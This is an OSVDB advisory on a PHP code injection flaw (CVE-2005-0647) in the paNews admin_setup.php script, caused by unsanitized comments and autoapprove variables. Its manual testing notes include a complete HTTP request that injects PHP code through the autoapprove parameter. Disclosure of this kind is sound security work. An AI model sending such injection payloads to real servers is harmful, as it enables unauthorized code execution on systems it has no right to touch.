paNews admin_setup.php Multiple Parameter Arbitrary PHP Code Injection

2005-03-01T23:14:28
ID OSVDB:15452
Type osvdb
Reporter Kernelpanik Labs(seclists@kernelpanik.org)
Modified 2005-03-01T23:14:28

Description

Vulnerability Description

paNews contains a flaw that may allow an attacker to inject arbitrary PHP code. The issue is due to the $$comments or $$autapprove variables in the admin_setup.php script not being properly sanitized and may allow an attacker to inject PHP code. Other variables may also be effected.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

paNews contains a flaw that may allow an attacker to inject arbitrary PHP code. The issue is due to the $$comments or $$autapprove variables in the admin_setup.php script not being properly sanitized and may allow an attacker to inject PHP code. Other variables may also be effected.

Manual Testing Notes

GET http://hawking/panews/index.php?action=admin&op=setup&form[lang]=english&form[comments]=1&form[autoapprove]=1;%20?%3E%20%3C?%20include(%22/var/cpuinfo%22);%20?%3E%20%3C?%20$trivial=1 HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Host: hawking Referer: http://hawking/panews/index.php User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0 Cookie: panews=%BF%3F%BF%3F0%BF%3F1108908178%BF%3F%BF%3Fframe%BF%3F0; IS_PANEWS=1 Keep-Alive: 300

References:

Other Advisory URL: http://www.kernelpanik.org/docs/kernelpanik/panews.txt Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=110969774502370&w=2 CVE-2005-0647